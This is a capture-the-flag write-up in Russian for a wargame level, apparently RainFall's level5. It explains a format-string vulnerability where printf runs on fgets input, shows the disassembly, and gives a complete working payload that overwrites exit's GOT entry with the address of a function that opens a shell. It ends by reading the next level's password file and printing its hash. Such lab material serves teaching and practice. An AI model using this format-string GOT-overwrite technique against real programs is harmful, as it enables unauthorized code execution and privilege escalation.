Эксплойт, выполняемый для этого уровня, аналогичен предыдущему. 
Однако глобальная переменная, которую нужно изменить, - это та, к которой перейдет exit. Этот адрес: \x38\x98\x04\x08. 
Его можно заменить адресом функции o. После этого функция o откроет оболочку.

1) disass n
   0x080484c2 <+0>:	push   %ebp
   0x080484c3 <+1>:	mov    %esp,%ebp
   0x080484c5 <+3>:	sub    $0x218,%esp
   0x080484cb <+9>:	mov    0x8049848,%eax
   0x080484d0 <+14>:	mov    %eax,0x8(%esp)
   0x080484d4 <+18>:	movl   $0x200,0x4(%esp)
   0x080484dc <+26>:	lea    -0x208(%ebp),%eax
   0x080484e2 <+32>:	mov    %eax,(%esp)
   0x080484e5 <+35>:	call   0x80483a0 <fgets@plt>
   0x080484ea <+40>:	lea    -0x208(%ebp),%eax
   0x080484f0 <+46>:	mov    %eax,(%esp)
   0x080484f3 <+49>:	call   0x8048380 <printf@plt>
   0x080484f8 <+54>:	movl   $0x1,(%esp)
   0x080484ff <+61>:	call   0x80483d0 <exit@plt>

printf выполняется с предыдущим fgets

2) disass main
   0x08048504 <+0>:	push   %ebp
   0x08048505 <+1>:	mov    %esp,%ebp
   0x08048507 <+3>:	and    $0xfffffff0,%esp
   0x0804850a <+6>:	call   0x80484c2 <n>
   0x0804850f <+11>:	leave  
   0x08048510 <+12>:	ret   

3) disass o
   0x080484a4 <+0>:	push   %ebp
   0x080484a5 <+1>:	mov    %esp,%ebp
   0x080484a7 <+3>:	sub    $0x18,%esp
   0x080484aa <+6>:	movl   $0x80485f0,(%esp)
   0x080484b1 <+13>:	call   0x80483b0 <system@plt>
   0x080484b6 <+18>:	movl   $0x1,(%esp)
   0x080484bd <+25>:	call   0x8048390 <_exit@plt>

Функция `main` вызывает функцию `n`, которая не возвращается, а вместо этого вызывает exit
=>   0x080484ff <+61>:	call   0x80483d0 <exit@plt>

Затем мы найдем адрес функции exit в таблице глобальных смещений
gdb> disass n
[...]
   0x080484ff <+61>: call 0x80483d0 <exit@plt>
[...]
gdb> disass 0x80483d0
[...]
   0x080483d0 <+0>: jmp DWORD PTR ds:0x8049838
[...]
gdb> x 0x8049838
0x8049838 <exit@got.plt>: 0x080483d6

`o` находится по адресу 0x80484a4, а `exit` находится по адресу `0x8049838`.


4) python -c 'print "\x38\x98\x04\x08" + 2*"%12x" + "%134513800x" + "%n"' > /tmp/ex
5) cat /tmp/ex - | ./level5

6) cat /home/user/level6/.pass
d3b7bf1025225bd715fa8ccb54ef06ca70b9125ac855aeab4878217177f41a31

